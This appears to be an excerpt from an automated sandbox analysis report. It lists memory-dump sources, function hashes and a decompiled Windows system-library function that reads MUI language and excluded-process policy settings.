                                                      • Associated: 00000006.00000002.505684859.0000000000A50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506053222.0000000000B40000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506065389.0000000000B50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506131260.0000000000B54000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506142816.0000000000B57000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506158210.0000000000B60000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506420195.0000000000BC0000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                      • Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
                                                      • Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                      • Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A71930, Relevance: .0, Instructions: 6COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.505706548.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                      • Associated: 00000006.00000002.505684859.0000000000A50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506053222.0000000000B40000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506065389.0000000000B50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506131260.0000000000B54000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506142816.0000000000B57000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506158210.0000000000B60000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506420195.0000000000BC0000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                                      • Instruction ID: 3aeeca65ea1aaf37b62c9893cb2d02334d47a3b29990fed3fb0e6cbc500f1d8d
                                                      • Opcode Fuzzy Hash: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                                      • Instruction Fuzzy Hash: 52B01272100940C7E34AA714DE07B8BB210FBD0F01F00893BA04B85D50D638A92CC546
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A6F938, Relevance: .0, Instructions: 6COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.505706548.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                      • Associated: 00000006.00000002.505684859.0000000000A50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506053222.0000000000B40000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506065389.0000000000B50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506131260.0000000000B54000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506142816.0000000000B57000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506158210.0000000000B60000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506420195.0000000000BC0000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                                      • Instruction ID: d523cc507bde657408e54325c2dcaf12b60df831943b7985b4c6fe4931788f26
                                                      • Opcode Fuzzy Hash: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                                      • Instruction Fuzzy Hash: FCB0927220194087E2099B04D905B477251EBC0B01F408934A50646590DB399928D947
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A7010C, Relevance: .0, Instructions: 6COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.505706548.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                      • Associated: 00000006.00000002.505684859.0000000000A50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506053222.0000000000B40000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506065389.0000000000B50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506131260.0000000000B54000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506142816.0000000000B57000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506158210.0000000000B60000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506420195.0000000000BC0000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                      • Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
                                                      • Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                      • Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A71148, Relevance: .0, Instructions: 6COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.505706548.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                      • Associated: 00000006.00000002.505684859.0000000000A50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506053222.0000000000B40000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506065389.0000000000B50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506131260.0000000000B54000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506142816.0000000000B57000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506158210.0000000000B60000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506420195.0000000000BC0000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                      • Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
                                                      • Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                      • Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A6FAB8, Relevance: .0, Instructions: 6COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.505706548.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                      • Associated: 00000006.00000002.505684859.0000000000A50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506053222.0000000000B40000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506065389.0000000000B50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506131260.0000000000B54000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506142816.0000000000B57000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506158210.0000000000B60000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506420195.0000000000BC0000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                      • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                                      • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                      • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A6FA20, Relevance: .0, Instructions: 6COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.505706548.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                      • Associated: 00000006.00000002.505684859.0000000000A50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506053222.0000000000B40000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506065389.0000000000B50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506131260.0000000000B54000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506142816.0000000000B57000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506158210.0000000000B60000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506420195.0000000000BC0000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                                      • Instruction ID: 9b5f4fb9875c6876c932e4128e9800c708acc4d40f0b969179b44b3e8b2884d0
                                                      • Opcode Fuzzy Hash: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                                      • Instruction Fuzzy Hash: 4FB01272100580C7E30D9714D90AB4B7210FB80F00F00CD3AA00781861DB78DA2CD45A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A6FA50, Relevance: .0, Instructions: 6COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.505706548.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                      • Associated: 00000006.00000002.505684859.0000000000A50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506053222.0000000000B40000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506065389.0000000000B50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506131260.0000000000B54000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506142816.0000000000B57000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506158210.0000000000B60000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506420195.0000000000BC0000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                                      • Instruction ID: 2cae8b11bd858d750de1a79d340ce6dfe3ec44f87311ce0e8d0be64a47f0ebf6
                                                      • Opcode Fuzzy Hash: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                                      • Instruction Fuzzy Hash: 9BB01272100544C7E349A714DA07B8B7210FB80F00F008D3BA04782851DFB89A2CE986
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A6FBE8, Relevance: .0, Instructions: 6COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.505706548.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                      • Associated: 00000006.00000002.505684859.0000000000A50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506053222.0000000000B40000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506065389.0000000000B50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506131260.0000000000B54000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506142816.0000000000B57000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506158210.0000000000B60000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506420195.0000000000BC0000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                                      • Instruction ID: 9452a8d0b0f104eb9e4922b1c8778681c83a3ee0f3d85b1ffb0a7dc5c1b1eaf2
                                                      • Opcode Fuzzy Hash: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                                      • Instruction Fuzzy Hash: 9AB01272100640C7E349A714DA0BB5B7210FB80F00F00893BE00781852DF389A2CD986
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A6FB50, Relevance: .0, Instructions: 6COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.505706548.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                      • Associated: 00000006.00000002.505684859.0000000000A50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506053222.0000000000B40000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506065389.0000000000B50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506131260.0000000000B54000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506142816.0000000000B57000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506158210.0000000000B60000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506420195.0000000000BC0000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                      • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                      • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                      • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A707AC, Relevance: .0, Instructions: 6COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.505706548.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                      • Associated: 00000006.00000002.505684859.0000000000A50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506053222.0000000000B40000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506065389.0000000000B50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506131260.0000000000B54000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506142816.0000000000B57000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506158210.0000000000B60000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506420195.0000000000BC0000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                      • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                      • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                      • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A98788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 94%
                                                      			E00A98788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E00A98460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E00A7E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E00A9718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E00A98460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E00A7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E00A9718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E00A98460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E00A98460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E00A98460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E00A7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E00A7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E00A9718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E00A7E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E00A72340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E00A8E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E00A7E2A8(_t322,  &_v68, _v16);
								if(E00A95553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E00A8E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E00A7E2A8(_t322,  &_v68, _t236);
								if(E00A95553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E00A7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E00A7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E00A9718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E00A7E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E00A72340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E00A8E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E00A7E2A8(_v12,  &_v68, _v16);
							if(E00A95553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E00A8E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E00A7E2A8(_t322,  &_v68, _t269);
							if(E00A95553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E00A7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E00A7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E00A9718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E00A7E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E00A72340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E00A8E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E00A7E2A8(_v12,  &_v68, _v16);
						if(E00A95553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E00A8E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E00A7E2A8(_t322,  &_v68, _t296);
						if(E00A95553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E00A7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E00A7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                                      0x00a98788
                                                      0x00a98788
                                                      0x00a98791
                                                      0x00a98794
                                                      0x00a98798
                                                      0x00a9879b
                                                      0x00a9879e
                                                      0x00a987a1
                                                      0x00a987a4
                                                      0x00a987a7
                                                      0x00a987aa
                                                      0x00a987af
                                                      0x00ae1ad3
                                                      0x00a98b0a
                                                      0x00a98b0d
                                                      0x00a98b13
                                                      0x00a98b19
                                                      0x00a98b1f
                                                      0x00a98b25
                                                      0x00a98b2b
                                                      0x00a98b31
                                                      0x00a98b37
                                                      0x00a98b3d
                                                      0x00a98b46
                                                      0x00a98b46
                                                      0x00a987c6
                                                      0x00a987d0
                                                      0x00ae1ae0
                                                      0x00ae1ae6
                                                      0x00ae1af8
                                                      0x00ae1af8
                                                      0x00ae1afd
                                                      0x00ae1afe
                                                      0x00ae1b01
                                                      0x00ae1b06
                                                      0x00ae1b06
                                                      0x00a987d6
                                                      0x00a987f2
                                                      0x00a987f7
                                                      0x00a98807
                                                      0x00a9880a
                                                      0x00a9880f
                                                      0x00a98810
                                                      0x00a98813
                                                      0x00a98818
                                                      0x00a98818
                                                      0x00a9882c
                                                      0x00a98831
                                                      0x00a98838
                                                      0x00a98908
                                                      0x00a98920
                                                      0x00a989f0
                                                      0x00a98a08
                                                      0x00a98af6
                                                      0x00a98af6
                                                      0x00a98af8
                                                      0x00a98afb
                                                      0x00ae1beb
                                                      0x00ae1beb
                                                      0x00a98b04
                                                      0x00ae1bf8
                                                      0x00ae1c0e
                                                      0x00ae1c13
                                                      0x00ae1c16
                                                      0x00ae1c16
                                                      0x00ae1bf8
                                                      0x00000000
                                                      0x00a98b04
                                                      0x00a98a0e
                                                      0x00a98a11
                                                      0x00a98a14
                                                      0x00a98a15
                                                      0x00a98a18
                                                      0x00a98a22
                                                      0x00a98b59
                                                      0x00a98a28
                                                      0x00a98a3c
                                                      0x00a98a3c
                                                      0x00a98a42
                                                      0x00ae1bb0
                                                      0x00ae1b11
                                                      0x00ae1b11
                                                      0x00000000
                                                      0x00a98a48
                                                      0x00a98a51
                                                      0x00a98a5b
                                                      0x00a98a5e
                                                      0x00a98a61
                                                      0x00a98a69
                                                      0x00a98a69
                                                      0x00a98a6d
                                                      0x00000000
                                                      0x00000000
                                                      0x00a98a74
                                                      0x00a98a7c
                                                      0x00a98a7d
                                                      0x00a98a91
                                                      0x00a98a93
                                                      0x00a98a93
                                                      0x00a98a98
                                                      0x00a98a9b
                                                      0x00a98aa1
                                                      0x00a98aa1
                                                      0x00a98aa4
                                                      0x00a98aaa
                                                      0x00a98ab1
                                                      0x00a98ac5
                                                      0x00a98ac7
                                                      0x00a98ac7
                                                      0x00a98ac5
                                                      0x00a98ace
                                                      0x00ae1bc9
                                                      0x00ae1bce
                                                      0x00ae1bd2
                                                      0x00ae1bd2
                                                      0x00a98ad8
                                                      0x00a98aeb
                                                      0x00a98aeb
                                                      0x00a98af0
                                                      0x00a98af4
                                                      0x00000000
                                                      0x00a98af4
                                                      0x00a98a42
                                                      0x00a98926
                                                      0x00a98929
                                                      0x00a9892c
                                                      0x00a9892d
                                                      0x00a98930
                                                      0x00a98935
                                                      0x00a9893a
                                                      0x00a98b51
                                                      0x00a98940
                                                      0x00a98954
                                                      0x00a98954
                                                      0x00a9895a
                                                      0x00ae1b63
                                                      0x00000000
                                                      0x00a98960
                                                      0x00a98969
                                                      0x00a98973
                                                      0x00a98976
                                                      0x00a98979
                                                      0x00a9897e
                                                      0x00a98981
                                                      0x00a98981
                                                      0x00a98986
                                                      0x00000000
                                                      0x00000000
                                                      0x00ae1b6e
                                                      0x00ae1b74
                                                      0x00ae1b7b
                                                      0x00ae1b8f
                                                      0x00ae1b91
                                                      0x00ae1b91
                                                      0x00ae1b99
                                                      0x00ae1b9c
                                                      0x00ae1ba2
                                                      0x00ae1ba2
                                                      0x00a9898c
                                                      0x00a98992
                                                      0x00a98999
                                                      0x00a989ad
                                                      0x00ae1ba8
                                                      0x00ae1ba8
                                                      0x00a989ad
                                                      0x00a989b6
                                                      0x00a989c8
                                                      0x00a989cd
                                                      0x00a989d0
                                                      0x00a989d0
                                                      0x00a989d6
                                                      0x00a989e8
                                                      0x00a989e8
                                                      0x00a989ed
                                                      0x00000000
                                                      0x00a989ed
                                                      0x00a9895a
                                                      0x00a9883e
                                                      0x00a98841
                                                      0x00a98844
                                                      0x00a98845
                                                      0x00a98848
                                                      0x00a9884d
                                                      0x00a98852
                                                      0x00a98b49
                                                      0x00a98858
                                                      0x00a9886c
                                                      0x00a9886c
                                                      0x00a98872
                                                      0x00ae1b0e
                                                      0x00000000
                                                      0x00a98878
                                                      0x00a98881
                                                      0x00a9888b
                                                      0x00a9888e
                                                      0x00a98891
                                                      0x00a98896
                                                      0x00a98899
                                                      0x00a98899
                                                      0x00a9889e
                                                      0x00000000
                                                      0x00000000
                                                      0x00ae1b21
                                                      0x00ae1b27
                                                      0x00ae1b2e
                                                      0x00ae1b42
                                                      0x00ae1b44
                                                      0x00ae1b44
                                                      0x00ae1b4c
                                                      0x00ae1b4f
                                                      0x00ae1b55
                                                      0x00ae1b55
                                                      0x00a988a4
                                                      0x00a988aa
                                                      0x00a988b1
                                                      0x00a988c5
                                                      0x00ae1b5b
                                                      0x00ae1b5b
                                                      0x00a988c5
                                                      0x00a988ce
                                                      0x00a988e0
                                                      0x00a988e5
                                                      0x00a988e8
                                                      0x00a988e8
                                                      0x00a988ee
                                                      0x00a98900
                                                      0x00a98900
                                                      0x00a98905
                                                      0x00000000
                                                      0x00a98905

                                                      APIs
                                                      Strings
                                                      • WindowsExcludedProcs, xrefs: 00A987C1
                                                      • Kernel-MUI-Number-Allowed, xrefs: 00A987E6
